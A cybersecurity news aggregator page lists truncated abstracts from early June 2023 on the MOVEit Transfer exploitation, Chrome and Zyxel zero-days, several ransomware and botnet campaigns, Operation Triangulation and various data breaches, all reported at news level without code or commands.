5 Reasons Why IT Security Tools Don’t Work For OT Full Text
Abstract
Attacks on critical infrastructure and other OT systems are on the rise as digital transformation and OT/IT convergence continue to accelerate. Water treatment facilities, energy providers, factories, and chemical plants — the infrastructure that undergirds our daily lives could all be at risk. Disrupting or manipulating OT systems stands to pose real physical harm to citizens, environments, and economies. Yet the landscape of OT security tools is far less developed than its information technology (IT) counterpart. According to a recent report from Takepoint Research and Cyolo , there is a notable lack of confidence in the tools commonly used to secure remote access to industrial environments. Figure 1: New research reveals a large gap across industries between the level of concern about security risks and the level of confidence in existing solutions for industrial secure remote access (I-SRA). The traditional security strategy of industrial environments was isolation – isolatioThe Hacker News
June 6, 2023 – Vulnerabilities
Google fixed the third Chrome zero-day of 2023 Full Text
Abstract
Google released security updates to address a high-severity zero-day flaw in the Chrome web browser that it actively exploited in the wild. Google released security updates to address a high-severity vulnerability, tracked as CVE-2023-3079, in its Chrome...Security Affairs
June 6, 2023 – General
Verizon 2023 DBIR: Human Error Involved in Many Breaches, Ransomware Cost Surges Full Text
Abstract
Ransomware accounted for 24% of cybersecurity incidents analyzed by Verizon. The company saw the number of ransomware attacks being higher in the past two years than in the previous five years combined.Cyware
June 06, 2023 – Vulnerabilities
Zero-Day Alert: Google Issues Patch for New Chrome Vulnerability - Update Now! Full Text
Abstract
Google on Monday released security updates to patch a high-severity flaw in its Chrome web browser that it said is being actively exploited in the wild. Tracked as CVE-2023-3079 , the vulnerability has been described as a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on June 1, 2023. "Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD). The tech giant, as is typically the case, did not disclose details of the nature of the attacks, but noted it's "aware that an exploit for CVE-2023-3079 exists in the wild." With the latest development, Google has addressed a total of three actively exploited zero-days in Chrome since the start of the year - CVE-2023-2033 (CVSS score: 8.8) - Type CoThe Hacker News
June 6, 2023 – Criminals
Cyclops Ransomware group offers a multiplatform Info Stealer Full Text
Abstract
Researchers from security firm Uptycs reported that threat actors linked to the Cyclops ransomware are offering a Go-based information stealer. The Cyclops group has developed multi-platform ransomware that can infect Windows, Linux, and macOS...Security Affairs
June 6, 2023 – Cryptocurrency
Impulse Team Ran Years-Long Mostly-Undetected Cryptocurrency Scam Full Text
Abstract
The scam works via an advanced fee fraud, tricking victims into believing they've won cryptocurrency rewards but requiring them to pay a small activation fee to access their rewards.Cyware
June 06, 2023 – Ransomware
Cyclops Ransomware Gang Offers Go-Based Info Stealer to Cybercriminals Full Text
Abstract
Threat actors associated with the Cyclops ransomware have been observed offering an information stealer malware that's designed to capture sensitive data from infected hosts. "The threat actor behind this [ransomware-as-a-service] promotes its offering on forums," Uptycs said in a new report. "There it requests a share of profits from those engaging in malicious activities using its malware." Cyclops ransomware is notable for targeting all major desktop operating systems, including Windows, macOS, and Linux. It's also designed to terminate any potential processes that could interfere with encryption. The macOS and Linux versions of Cyclops ransomware are written in Golang. The ransomware further employs a complex encryption scheme that's a mix of asymmetric and symmetric encryption. The Go-based stealer, for its part, is designed to target Windows and Linux systems, capturing details such as operating system information, computer name, number oThe Hacker News
June 6, 2023 – Breach
British Airways, BBC and Boots were impacted the by Zellis data breach Full Text
Abstract
The BBC and British Airways were both impacted by the data breach suffered by the payroll provider Zellis. As a result of the cyber attack on the payroll provider Zellis, the personal data of employees at the BBC and British Airways has been compromised...Security Affairs
June 6, 2023 – Government
NATO: Military cyber defenders need to be present on networks during peacetime Full Text
Abstract
David van Weel, NATO’s assistant secretary general for emerging security challenges, told the 15th annual International Conference on Cyber Conflict (CyCon) that NATO members will begin recognizing cyberspace as “a permanently contested environment.”Cyware
June 06, 2023 – Phishing
Chinese PostalFurious Gang Strikes UAE Users with Sneaky SMS Phishing Scheme Full Text
Abstract
A Chinese-speaking phishing gang dubbed PostalFurious has been linked to a new SMS campaign that's targeting users in the U.A.E. by masquerading as postal services and toll operators, per Group-IB. The fraudulent scheme entails sending users bogus text messages asking them to pay a vehicle trip fee to avoid additional fines. The messages also contain a shortened URL to conceal the actual phishing link. Clicking on the link directs the unsuspecting recipients to a fake landing page that's designed to capture payment credentials and personal data. The campaign is estimated to be active as of April 15, 2023. "The URLs from the texts lead to fake branded payment pages that ask for personal details, such as name, address, and credit card information," Group-IB said . "The phishing pages appropriate the official name and logo of the impersonated postal service provider." The exact scale of the attacks is currently unknown. What's known is that the texThe Hacker News
June 06, 2023 – Vulnerabilities
Zyxel Firewalls Under Attack! Urgent Patching Required Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday placed two recently disclosed flaws in Zyxel firewalls to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. The vulnerabilities, tracked as CVE-2023-33009 and CVE-2023-33010 , are buffer overflow vulnerabilities that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution. Patches to plug the security holes were released by Zyxel on May 24, 2023. The following list of devices are affected - ATP (versions ZLD V4.32 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2) USG FLEX (versions ZLD V4.50 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2) USG FLEX50(W) / USG20(W)-VPN (versions ZLD V4.25 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2) VPN (versions ZLD V4.30 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2), and ZyWALL/USG (versions ZLD V4.25 to V4.73 Patch 1, patched in ZLD V4.73 Patch 2) While the exaThe Hacker News
June 5, 2023 – Breach
Scrubs & Beyond Leaks 400GB of User PII and Card Data in Plain Text Full Text
Abstract
The database was exposed on May 16, 2023. Researchers identified the exposure on May 25, 2023, and since then, the information has remained exposed. Currently, the server holds over 100,000 customer records, totaling 400 GB in size.Cyware
June 05, 2023 – Hacker
Microsoft: Lace Tempest Hackers Behind Active Exploitation of MOVEit Transfer App Full Text
Abstract
Microsoft has officially linked the ongoing active exploitation of a critical flaw in the Progress Software MOVEit Transfer application to a threat actor it tracks as Lace Tempest . "Exploitation is often followed by deployment of a web shell with data exfiltration capabilities," the Microsoft Threat Intelligence team said in a series of tweets today. "CVE-2023-34362 allows attackers to authenticate as any user." Lace Tempest, also called Storm-0950, is a ransomware affiliate that overlaps with other groups such as FIN11, TA505, and Evil Corp. It's also known to operate the Cl0p extortion site. The threat actor also has a track record of exploiting different zero-day flaws to siphon data and extort victims, with the group recently observed weaponizing a severe bug in PaperCut servers . CVE-2023-34362 relates to an SQL injection vulnerability in MOVEit Transfer that enables unauthenticated, remote attackers to gain access to the database and executeThe Hacker News
June 5, 2023 – Vulnerabilities
KeePass fixed the bug that allows the extraction of the cleartext master password Full Text
Abstract
KeePass addressed the CVE-2023-32784 bug that allows the extraction of the cleartext master password from the memory of the client. KeePass has addressed the CVE-2023-32784 vulnerability, which allowed the retrieval of the clear-text master password...Security Affairs
June 5, 2023 – Vulnerabilities
Gigabyte Rolls Out BIOS Updates to Remove Backdoor From Motherboards Full Text
Abstract
The issue, disclosed last week by firmware and hardware security company Eclypsium, is that the firmware of more than 270 Gigabyte motherboards drops a Windows binary that is executed at boot-up to fetch and execute a payload from Gigabyte’s servers.Cyware
June 05, 2023 – General
The Annual Report: 2024 Plans and Priorities for SaaS Security Full Text
Abstract
Over 55% of security executives report that they have experienced a SaaS security incident in the past two years — ranging from data leaks and data breaches to SaaS ransomware and malicious apps (as seen in figures 1 and 2). Figure 1. How many organizations have experienced a SaaS security incident within the past two years The SaaS Security Survey Report: Plans and Priorities for 2024 , developed by CSA in conjunction with Adaptive Shield, dives into these SaaS security incidents and more. This report shares the perspective of over 1,000 CISOs and other security professionals and shines a light on SaaS risks, existing threats, and the way organizations are preparing for 2024. Click here to download the full report . SaaS Security Incidents Are on the Rise Anecdotally, it was clear that SaaS security incidents increased over the last year. More headlines and stories covered SaaS breaches and data leaks than ever before. However, this report provides a stunning context to thoseThe Hacker News
June 5, 2023 – Criminals
Microsoft blames Clop ransomware gang for ‘MOVEit Transfer’ attacks Full Text
Abstract
Microsoft attributes the recent campaign exploiting a zero-day in the MOVEit Transfer platform to the Clop ransomware gang. The Clop ransomware gang (aka Lace Tempest) is credited by Microsoft for the recent campaign that exploits a zero-day vulnerability,...Security Affairs
June 5, 2023 – Attack
Australian cyber-op attacked ISIL with zero-click exploit Full Text
Abstract
The documentary, BREAKING the CODE: Cyber Secrets Revealed, reveals that the Australian Signals Directorate developed three payloads it could deploy to ISIL fighters' smartphones and PCs "without ISIL having to interact with the device in any way."Cyware
June 05, 2023 – Skimming
Magento, WooCommerce, WordPress, and Shopify Exploited in Web Skimmer Attack Full Text
Abstract
Cybersecurity researchers have unearthed a new ongoing Magecart -style web skimmer campaign that's designed to steal personally identifiable information (PII) and credit card data from e-commerce websites. A noteworthy aspect that sets it apart from other Magecart campaigns is that the hijacked sites further serve as "makeshift" command-and-control (C2) servers, using the cover to facilitate the distribution of malicious code without the knowledge of the victim sites. Web security company Akamai said it identified victims of varying sizes in North America, Latin America, and Europe, potentially putting the personal data of thousands of site visitors at risk of being harvested and sold for illicit profits. "Attackers employ a number of evasion techniques during the campaign, including obfuscating [using] Base64 and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager," Akamai security researcher Roman LvThe Hacker News
June 5, 2023 – Outage
Idaho Hospitals hit by a cyberattack that impacted their operations Full Text
Abstract
Last week two eastern Idaho hospitals and their clinics were hit by a cyberattack that temporarily impacted their operations. Last week the Idaho Falls Community Hospital was hit by a cyber attack that impacted its operations. Officials at the hospital...Security Affairs
June 5, 2023 – Hacker
Update: Ransomware Group Used MOVEit Exploit to Steal Data From Dozens of Organizations Full Text
Abstract
Mandiant has attributed the attack to UNC4857, a new threat cluster, and named the delivered webshell LemurLoot. Microsoft, on the other hand, is confident that the threat actor behind the Cl0p ransomware is responsible for the attack.Cyware
June 05, 2023 – Criminals
Brazilian Cybercriminals Using LOLBaS and CMD Scripts to Drain Bank Accounts Full Text
Abstract
An unknown cybercrime threat actor has been observed targeting Spanish- and Portuguese-speaking victims to compromise online banking accounts in Mexico, Peru, and Portugal. "This threat actor employs tactics such as LOLBaS (living-off-the-land binaries and scripts), along with CMD-based scripts to carry out its malicious activities," the BlackBerry Research and Intelligence Team said in a report published last week. The cybersecurity company attributed the campaign, dubbed Operation CMDStealer , to a Brazilian threat actor based on an analysis of the artifacts. The attack chain primarily leverages social engineering, banking on Portuguese and Spanish emails containing tax- or traffic violation-themed lures to trigger the infections and gain unauthorized access to victims' systems. The emails come fitted with an HTML attachment that contains obfuscated code to fetch the next-stage payload from a remote server in the form of a RAR archive file. The files, which areThe Hacker News
June 5, 2023 – Botnet
Experts warn of a surge of TrueBot activity in May 2023 Full Text
Abstract
VMware’s Carbon Black Managed Detection and Response (MDR) team observed a surge of TrueBot activity in May 2023. Researchers at VMware’s Carbon Black Managed Detection and Response (MDR) team warn of a surge of TrueBot activity in May 2023. Truebot...Security Affairs
June 5, 2023 – Disinformation
A new wave of sophisticated digital fraud hits Europe Full Text
Abstract
Forced verification and deepfake cases multiply at alarming rates in the UK and continental Europe, according to Sumsub. In Germany alone, forced verification grew by 1500% as a proportion of all fraud cases to 5% of all fraud in Q1 2023.Cyware
June 05, 2023 – Botnet
Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors Full Text
Abstract
A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed. "TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said . Active since at least 2017, TrueBot is linked to a group known as Silence that's believed to share overlaps with the notorious Russian cybercrime actor known as Evil Corp . Recent TrueBot infections have leveraged a critical flaw in Netwrix auditor ( CVE-2022-31199 , CVSS score: 9.8) as well as Raspberry Robin as delivery vectors. The attack chain documented by VMware, on the other hand, starts off with a drive-by-download of an executable named " update.exe " from Google Chrome, suggesting that users are lured into downloading the malware under the pretext of a software update. Once run, update.exe establishes connections with a kThe Hacker News
June 5, 2023 – Skimming
Magecart campaign abuses legitimate sites to host web skimmers and act as C2 Full Text
Abstract
A new ongoing Magecart web skimmer campaign abuse legitimate websites to act as makeshift command and control (C2) servers. Akamai researchers discovered a new ongoing Magecart web skimmer campaign aimed at stealing personally identifiable information...Security Affairs
June 5, 2023 – Vulnerabilities
Zyxel published guidance for protecting devices from ongoing attacks Full Text
Abstract
Zyxel has published guidance for protecting firewall and VPN devices from ongoing attacks exploiting the CVE-2023-28771, CVE-2023-33009, and CVE-2023-33010 vulnerabilities.Cyware
June 5, 2023 – Criminals
Spanish bank Globalcaja confirms Play ransomware attack Full Text
Abstract
Play ransomware group claims responsibility for a ransomware attack that hit Globalcaja, one of the major banks in Spain. Globalcaja is a financial institution in the autonomous community of Castilla-La Mancha, it has more than 300 offices across...Security Affairs
June 5, 2023 – Hacker
The Hidden Menace of the Terminator Antivirus Killer Full Text
Abstract
A threat actor was discovered promoting a tool called Terminator that can reportedly bypass 24 antivirus, EDR, and XDR solutions. However, Crowdstrike found that it uses a Bring Your Own Vulnerable Driver (BYOVD) attack. Presently, the vulnerable driver used by Terminator is only being identified b ... Read MoreCyware
June 4, 2023 – Ransomware
New BlackSuit Ransomware Exhibit Striking Similarities With Royal Full Text
Abstract
Trend Micro examined and uncovered “an extremely high degree of similarity” between the recently surfaced BlackSuit group and the Royal ransomware group. They share approximately 98% similarity in functions, 99.5% similarity in code blocks, and 98.9% similarity in jump instructions, as witnessed on ... Read MoreCyware
June 4, 2023 – General
Security Affairs newsletter Round 422 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Xplain...Security Affairs
June 4, 2023 – Attack
Void Rabisu Group Uses RomCom for Geopolitical Attacks Full Text
Abstract
Researchers shed light on evolving objectives of the Void Rabisu hacking group as they uncovered a campaign that used a fake version of the Ukrainian army’s Delta situational awareness website to lure targets into installing the RomCom backdoor. While their previous operations were centered on data ... Read MoreCyware
June 4, 2023 – Attack
Xplain hack impacted the Swiss cantonal police and Fedpol Full Text
Abstract
Several Swiss cantonal police, the army, customs and the Federal Office of Police (Fedpol) were impacted by the attack against IT firm Xplain. Swiss police launched an investigation into the cyber attack that hit the Bernese IT company...Security Affairs
June 4, 2023 – Vulnerabilities
Zyxel published guidance for protecting devices from ongoing attacks Full Text
Abstract
Zyxel has published guidance for protecting firewall and VPN devices from the ongoing attacks recently discovered. Zyxel has published guidance for protecting firewall and VPN devices from ongoing attacks exploiting CVE-2023-28771, CVE-2023-33009,...Security Affairs
June 03, 2023 – Ransomware
New Linux Ransomware Strain BlackSuit Shows Striking Similarities to Royal Full Text
Abstract
An analysis of the Linux variant of a new ransomware strain called BlackSuit has covered significant similarities with another ransomware family called Royal . Trend Micro, which examined an x64 VMware ESXi version targeting Linux machines, said it identified an "extremely high degree of similarity" between Royal and BlackSuit. "In fact, they're nearly identical, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps based on BinDiff, a comparison tool for binary files," Trend Micro researchers noted . A comparison of the Windows artifacts has identified 93.2% similarity in functions, 99.3% in basic blocks, and 98.4% in jumps based on BinDiff. BlackSuit first came to light in early May 2023 when Palo Alto Networks Unit 42 drew attention to its ability to target both Windows and Linux hosts. In line with other ransomware groups, it runs a double extortion scheme that steals and encrypts sensitive data in a cThe Hacker News
June 03, 2023 – General
Cloud Security Tops Concerns for Cybersecurity Leaders: EC-Council’s Certified CISO Hall of Fame Report 2023 Full Text
Abstract
A survey of global cybersecurity leaders through the 2023 Certified CISO Hall of Fame Report commissioned by the EC-Council identified 4 primary areas of grave concern: cloud security, data security, security governance, and lack of cybersecurity talent. EC-Council, the global leader in cybersecurity education and training, released its Certified Chief Information Security Officer Hall of Fame Report today, honoring the top 50 Certified CISOs globally. This report reveals that approximately 50% of surveyed information security leaders identified cloud security as their top concern. Findings from the report suggest the top cybersecurity concerns with which organizations struggle and highlight the need for implementing robust security frameworks with skilled cybersecurity professionals to effectively contain emerging threats. On average, an enterprise uses approximately 1,295 cloud services, while an employee uses at least 36 cloud-based services daily. Cloud security risk is real forThe Hacker News
June 3, 2023 – Malware
DogeRAT Malware Eyes Banking and Entertainment Sectors Full Text
Abstract
A new Android malware threat was discovered targeting users primarily located in India. Named DogeRAT, the malware is distributed through social media and messaging platforms disguised as Opera Mini, OpenAI ChatGPT, and premium versions of Netflix and YouTube. It can gain unauthorized access to a u ... Read MoreCyware
June 03, 2023 – Policy and Law
FTC Slams Amazon with $30.8M Fine for Privacy Violations Involving Alexa and Ring Full Text
Abstract
The U.S. Federal Trade Commission (FTC) has fined Amazon a cumulative $30.8 million over a series of privacy lapses regarding its Alexa assistant and Ring security cameras. This comprises a $25 million penalty for breaching children's privacy laws by retaining their Alexa voice recordings for indefinite time periods and preventing parents from exercising their deletion rights. "Amazon's history of misleading parents, keeping children's recordings indefinitely, and flouting parents' deletion requests violated COPPA and sacrificed privacy for profits," FTC's Samuel Levine said. As part of the court order, the retail giant has been mandated to delete the collected information, including inactive child accounts, geolocation data, and voice recordings, and prohibited from gathering such data to train its algorithms. It's also required to disclose to customers its data retention practices. Amazon has also agreed to fork out an additional $5.8 millionThe Hacker News
June 3, 2023 – Attack
Hackers Exploit Barracuda ESG Zero-Day Flaw to Backdoor Malware Full Text
Abstract
Barracuda has disclosed information about a recent attack campaign that exploits a zero-day vulnerability in its ESG appliances to deploy three different malware strains. The CISA added the flaw to its KEV catalog last week, urging federal agencies to apply the patches by June 16.Cyware
June 3, 2023 – APT
Kimsuky APT poses as journalists and broadcast writers in its attacks Full Text
Abstract
North Korea-linked APT group Kimsuky is posing as journalists to gather intelligence, a joint advisory from NSA and FBI warns. A joint advisory from the FBI, the U.S. Department of State, the National Security Agency (NSA), South Korea’s National...Security Affairs
June 3, 2023 – Vulnerabilities
Threat actors can exfiltrate data from Google Drive without leaving a trace Full Text
Abstract
Google Workspace (formerly G Suite) has a weak spot that can prevent the discovery of data exfiltration from Google Drive by a malicious outsider or insider, Mitiga researchers say.Cyware
June 3, 2023 – Ransomware
New Linux Ransomware BlackSuit is similar to Royal ransomware Full Text
Abstract
Experts noticed that the new Linux ransomware BlackSuit has significant similarities with the Royal ransomware family. Royal ransomware is one of the most notable ransomware families of 2022, it made the headlines in early May 2023 with the attack...Security Affairs
June 2, 2023 – Vulnerabilities
High-Severity Vulnerabilities Patched in Splunk Enterprise Full Text
Abstract
The most severe of these is CVE-2023-32707, a privilege escalation issue that allows low-privileged users with the ‘edit_user’ capability to escalate privileges to administrator, via a specially crafted web request.Cyware
June 02, 2023 – Botnet
New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America Full Text
Abstract
Spanish-speaking users in Latin America have been at the receiving end of a new botnet malware dubbed Horabot since at least November 2020. "Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad said . The botnet program also delivers a Windows-based financial trojan and a spam tool to harvest online banking credentials as well as compromise Gmail, Outlook, and Yahoo! webmail accounts to blast spam emails. The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor behind the campaign is believed to be in Brazil. Targeted users of the ongoing campaign primarily span accounting, construction and engineering, wholesale distributioThe Hacker News
June 2, 2023 – Government
CISA adds Progress MOVEit Transfer zero-day to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added actively exploited Progress MOVEit Transfer zero-day vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a Progress MOVEit Transfer SQL injection vulnerability,...Security Affairs
June 2, 2023 – Breach
Iranian dissidents’ claim of presidential hack likely legitimate, experts say Full Text
Abstract
A trove of documents, images, and videos from the offices of Iranian President Ebrahim Raisi posted online Monday appear to be authentic, cybersecurity experts familiar with the matter told CyberScoop on Wednesday.Cyware
June 02, 2023 – Education
The Importance of Managing Your Data Security Posture Full Text
Abstract
Data security is reinventing itself. As new data security posture management solutions come to market, organizations are increasingly recognizing the opportunity to provide evidence-based security that proves how their data is being protected. But what exactly is data security posture, and how do you manage it? Data security posture management (DSPM) became mainstream following the publication of Gartner® Cool Vendors™ in Data Security—Secure and Accelerate Advanced Use Cases. In that report , Gartner1 seems to have kicked off the popular use of the data security posture management term and massive investment in this space by every VC. Since that report, Gartner has identified at least 16 DSPM vendors, including Symmetry Systems. What is Data Security Posture? There certainly is a lot being marketed and published about data security posture management solutions themselves, but we first wanted to dig into what is data security posture? Symmetry Systems defines data security posThe Hacker News
June 2, 2023 – Botnet
New botnet Horabot targets Latin America Full Text
Abstract
A new botnet malware dubbed Horabot is targeting Spanish-speaking users in Latin America since at least November 2020. Cisco Talos researchers were observed deploying a previously unidentified botnet, dubbed Horabot, that is targeting Spanish-speaking...Security Affairs
June 2, 2023 – Breach
California-based Workforce Platform Prosperix Leaks Drivers Licenses and Medical Records of Job Seekers Full Text
Abstract
The misconfiguration led to the exposure of approximately 250,000 files. 42,000 of them contained the sensitive data of job seekers, namely: Full names, Dates of birth, Occupation history, Home addresses, Phone numbers, and Email addresses.Cyware
June 02, 2023 – Hacker
Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering Full Text
Abstract
The Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals. Israeli cybersecurity firm Check Point, which dubbed the Go-based malware TinyNote, said it functions as a first-stage payload capable of "basic machine enumeration and command execution via PowerShell or Goroutines." What the malware lacks in terms of sophistication, it makes up for it when it comes to establishing redundant methods to retain access to the compromised host by means of multiple persistency tasks and varied methods to communicate with different servers. Camaro Dragon overlaps with a threat actor widely tracked as Mustang Panda, a state-sponsored group from China that is known to be active since at least 2012. The adversarial collective was recently in the spotlight for a custom bespoke firmware implant called Horse Shell that co-opts TP-Link routers into a mesh network capable of transmitting coThe Hacker News
June 2, 2023 – Breach
Point32Health ransomware attack exposed info of 2.5M people Full Text
Abstract
After the recent ransomware attack, Point32Health disclosed a data breach that impacted 2.5 million Harvard Pilgrim Health Care subscribers. In April, the non-profit health insurer Point32Health took systems offline in response to a ransomware attack...Security Affairs
June 2, 2023 – Government
Federal vision to streamline cyber incident reporting expected this summer Full Text
Abstract
The Cyber Incident Reporting Council will issue a report to Congress "in the next month or two" with recommendations on ways to achieve harmony across a complex network of federal cyber mandates.Cyware
June 2, 2023 – Vulnerabilities
MOVEit Transfer software zero-day actively exploited in the wild Full Text
Abstract
Threat actors are exploiting a zero-day flaw in Progress Software’s MOVEit Transfer product to steal data from organizations. Threat actors are actively exploiting a zero-day vulnerability in the Progress MOVEit Transfer file transfer product to steal...Security Affairs
June 2, 2023 – Attack
New Horabot Campaign Targets Spanish-Speaking Users in the Americas Full Text
Abstract
Horabot enables the threat actor to control the victim’s Outlook mailbox, exfiltrate contacts’ email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim’s mailbox.Cyware
June 2, 2023 – Government
Russia’s FSB blames the US intelligence for Operation Triangulation Full Text
Abstract
Russia’s intelligence Federal Security Service (FSB) said that the recent attacks against iPhones with a zero-click iOS exploit as part of Operation Triangulation were carried out by US intelligence. Researchers from the Russian firm Kaspersky have...Security Affairs
June 2, 2023 – Breach
Discord Admins Hacked by Malicious Bookmarks – Krebs on Security Full Text
Abstract
A number of Discord communities focused on cryptocurrency have been hacked this past month after their administrators were tricked into running malicious Javascript code disguised as a Web browser bookmark.Cyware
June 02, 2023 – APT
North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks Full Text
Abstract
U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky , which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "North Korea relies heavily on intelligence gained from these spear-phishing campaigns," the agencies said . "Successful compromises of the targeted individuals enable Kimsuky actors to craft more credible and effective spear-phishing emails that can be leveraged against sensitive, high-value targets." Kimsuky refers to an ancillary element within North Korea's Reconnaissance General Bureau (RGB) and is known to collect tactical intelligence on geopolitical events and negotiations affecting the regiThe Hacker News
June 02, 2023 – Vulnerabilities
MOVEit Transfer Under Attack: Zero-Day Vulnerability Actively Being Exploited Full Text
Abstract
A critical flaw in Progress Software's in MOVEit Transfer managed file transfer application has come under widespread exploitation in the wild to take over vulnerable systems. The shortcoming, which is yet to be assigned a CVE identifier, relates to a severe SQL injection vulnerability that could lead to escalated privileges and potential unauthorized access to the environment. "An SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database," the company said . "Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or delete database elements." Patches for the bug have been made available by the Massachusetts-based company, which also owns Telerik, in tThe Hacker News
June 01, 2023 – Malware
Evasive QBot Malware Leverages Short-lived Residential IPs for Dynamic Attacks Full Text
Abstract
An analysis of the "evasive and tenacious" malware known as QBot has revealed that 25% of its command-and-control (C2) servers are merely active for a single day. What's more, 50% of the servers don't remain active for more than a week, indicating the use of an adaptable and dynamic C2 infrastructure , Lumen Black Lotus Labs said in a report shared with The Hacker News. "This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. QBot , also called QakBot and Pinkslipbot, is a persistent and potent threat that started off as a banking trojan before evolving into a downloader for other payloads, including ransomware. Its origins go back as far as 2007. The malware arrives on victims' devices via spear-phishing emails, which either directly incorporate lure files oThe Hacker News
June 1, 2023 – Policy and Law
Two Visions of Digital Sovereignty Full Text
Abstract
EU policymakers may soon finalize cybersecurity standards that could render the new Trans-Atlantic Data Privacy Framework irrelevant.Lawfare
June 1, 2023 – APT
Operation Triangulation: previously undetected malware targets iOS devices Full Text
Abstract
A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting...Security Affairs
June 01, 2023 – Malware
New Zero-Click Hack Targets iOS Users with Stealthy Root-Privilege Malware Full Text
Abstract
A previously unknown advanced persistent threat (APT) is targeting iOS devices as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019. "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said . The Russian cybersecurity company said it discovered traces of compromise after creating offline backups of the targeted devices. The attack chain begins with the iOS device receiving a message via iMessage that contains an attachment bearing the exploit. The exploit is said to be zero-click , meaning the receipt of the message triggers the vulnerability without requiring any user interaction in order to achieve code execution. It's also configured to retrieve additional payloads for privilege escalation and drop a final stage malware from a remote server that Kaspersky described asThe Hacker News
June 1, 2023 – Breach
California-based workforce platform Prosperix leaks drivers licenses and medical records Full Text
Abstract
Prosperix leaked nearly 250,000 files. The breach exposed job seekers’ sensitive data, including home addresses and phone numbers. Prosperix, formally Crowdstaffing, calls itself a “workforce innovation” company that develops software solutions...Security Affairs
June 01, 2023 – Criminals
Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin Full Text
Abstract
Cybersecurity researchers have unmasked the identity of one of the individuals who is believed to be associated with the e-crime actor known as XE Group . According to Menlo Security , which pieced together the information from different online sources, "Nguyen Huu Tai, who also goes by the names Joe Nguyen and Thanh Nguyen, has the strongest likelihood of being involved with the XE Group." XE Group (aka XeThanh), previously documented by Malwarebytes and Volexity , has a history of carrying out cyber criminal activities since at least 2013. It's suspected to be a threat actor of Vietnamese origin. Some of the entities targeted by the threat actor span government agencies, construction organizations, and healthcare sectors. It's known to compromise internet-exposed servers with known exploits and monetize the intrusions by installing password theft or credit card skimming code for online services. "As far back as 2014, the threat actor was seen creaThe Hacker News
June 1, 2023 – Privacy
Apps with over 420 Million downloads from Google Play unveil the discovery of SpinOk spyware Full Text
Abstract
Researchers discovered spyware, dubbed SpinOk, hidden in 101 Android apps with over 400 million downloads in Google Play. The malicious module is distributed as a marketing SDK that developers behind the apps embedded in their applications and games,...Security Affairs
June 01, 2023 – Malware
Malicious PyPI Packages Using Compiled Python Code to Bypass Detection Full Text
Abstract
Researchers have discovered a novel attack on the Python Package Index (PyPI) repository that employs compiled Python code to sidestep detection by application security tools. "It may be the first supply chain attack to take advantage of the fact that Python bytecode (PYC) files can be directly executed," ReversingLabs analyst Karlo Zanki said in a report shared with The Hacker News. The package in question is fshec2 , which was removed from the package registry on April 17, 2023, following responsible disclosure on the same day. PYC files are compiled bytecode files that are generated by the Python interpreter when a Python program is executed. "When a module is imported for the first time (or when the source file has changed since the current compiled file was created) a .pyc file containing the compiled code should be created in a __pycache__ subdirectory of the directory containing the .py file," explains the Python documentation. The package, per thThe Hacker News
June 1, 2023 – Attack
BlackCat claims the hack of the Casepoint legal technology platform used by US agencies Full Text
Abstract
The BlackCat ransomware gang claims to have hacked the Casepoint legal technology platform used US agencies, including SEC and FBI. The cybersecurity researcher Dominic Alvieri first noticed that the BlackCat ransomware gang added the company Casepoint...Security Affairs
June 01, 2023 – Solution
How Wazuh Improves IT Hygiene for Cyber Security Resilience Full Text
Abstract
